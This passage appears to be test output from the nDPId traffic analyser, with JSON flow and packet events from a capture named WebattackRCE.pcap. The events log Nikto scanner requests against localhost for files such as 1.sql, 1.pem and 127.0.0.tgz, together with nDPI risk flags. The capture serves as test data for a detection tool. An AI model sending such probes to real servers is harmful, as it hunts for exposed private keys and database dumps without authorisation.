(Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":258,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277070,"flow_last_seen":1576420277070,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277070,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50060,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":1,"flow_last_seen":1576420277070,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277070,"pkt":"AAAAAAAAAAAAAAAACABFAADCXGdAAEAG38x\/AAABfwAAAcOMH5AiiWQXZDyqFoAYAED+tgAAAQEICp1m\/HadZvx1R0VUIC8wLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277070,"flow_last_seen":1576420277070,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277070,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50060,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277072,"flow_last_seen":1576420277072,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277072,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50062,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":1,"flow_last_seen":1576420277072,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277072,"pkt":"AAAAAAAAAAAAAAAACABFAADDQNZAAEAG+1x\/AAABfwAAAcOOH5A+53ionbjt1YAYAED+twAAAQEICp1m\/HedZvx3R0VUIC8xMjcuMC4wLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
-01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":259,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277072,"flow_last_seen":1576420277072,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277072,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50062,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277074,"flow_last_seen":1576420277074,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50064,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":1576420277074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277074,"pkt":"AAAAAAAAAAAAAAAACABFAADDdgpAAEAGxih\/AAABfwAAAcOQH5DZ8k59fiDl9oAYAED+twAAAQEICp1m\/HqdZvx6R0VUIC8xMjcuMC4wLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":260,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277074,"flow_last_seen":1576420277074,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50064,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277075,"flow_last_seen":1576420277075,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277075,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50066,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":1,"flow_last_seen":1576420277075,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277075,"pkt":"AAAAAAAAAAAAAAAACABFAAC9f6pAAEAGvI5\/AAABfwAAAcOSH5AexUfewusNb4AYAED+sQAAAQEICp1m\/HudZvx7R0VUIC8xLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277075,"flow_last_seen":1576420277075,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277075,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50066,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277077,"flow_last_seen":1576420277077,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50068,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":1576420277077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277077,"pkt":"AAAAAAAAAAAAAAAACABFAAC9i6BAAEAGsJh\/AAABfwAAAcOUH5B4uLPsGcILh4AYAED+sQAAAQEICp1m\/H2dZvx9R0VUIC8xLnNxbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277077,"flow_last_seen":1576420277077,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50068,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277078,"flow_last_seen":1576420277078,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277078,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50070,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":1576420277078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277078,"pkt":"AAAAAAAAAAAAAAAACABFAAC9VOpAAEAG505\/AAABfwAAAcOWH5Crf2yePds4BoAYAED+sQAAAQEICp1m\/H6dZvx+R0VUIC8xLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":263,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277078,"flow_last_seen":1576420277078,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277078,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50070,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":264,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277079,"flow_last_seen":1576420277079,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277079,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50072,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":1,"flow_last_seen":1576420277079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277079,"pkt":"AAAAAAAAAAAAAAAACABFAAC9DWxAAEAGLs1\/AAABfwAAAcOYH5CSvzUdCWfTlYAYAED+sQAAAQEICp1m\/H+dZvx\/R0VUIC8xLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277079,"flow_last_seen":1576420277079,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277079,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50072,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":265,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277081,"flow_last_seen":1576420277081,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277081,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50074,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":1,"flow_last_seen":1576420277081,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277081,"pkt":"AAAAAAAAAAAAAAAACABFAADDZbZAAEAG1nx\/AAABfwAAAcOaH5Ap5V3Dc4s2n4AYAED+twAAAQEICp1m\/IGdZvyBR0VUIC8xMjcuMC4wLnRneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":265,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277081,"flow_last_seen":1576420277081,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277081,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50074,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277083,"flow_last_seen":1576420277083,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277083,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50076,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":1,"flow_last_seen":1576420277083,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277083,"pkt":"AAAAAAAAAAAAAAAACABFAADDEYFAAEAGKrJ\/AAABfwAAAcOcH5DxxikK7qXr+IAYAED+twAAAQEICp1m\/IOdZvyCR0VUIC8xMjcuMC4wLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277083,"flow_last_seen":1576420277083,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277083,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50076,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":267,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277084,"flow_last_seen":1576420277084,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277084,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50078,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":1,"flow_last_seen":1576420277084,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277084,"pkt":"AAAAAAAAAAAAAAAACABFAADFEhNAAEAGKh5\/AAABfwAAAcOeH5AvZipnVfZObIAYAED+uQAAAQEICp1m\/ISdZvyER0VUIC8xMjdfMF8wXzEucGVtIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277084,"flow_last_seen":1576420277084,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277084,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50078,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":268,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277086,"flow_last_seen":1576420277086,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277086,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50080,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":1,"flow_last_seen":1576420277086,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277086,"pkt":"AAAAAAAAAAAAAAAACABFAADF4EhAAEAGW+h\/AAABfwAAAcOgH5AMu9gyVttcv4AYAED+uQAAAQEICp1m\/IadZvyGR0VUIC8xMjdfMF8wXzEucGVtIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277086,"flow_last_seen":1576420277086,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277086,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50080,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 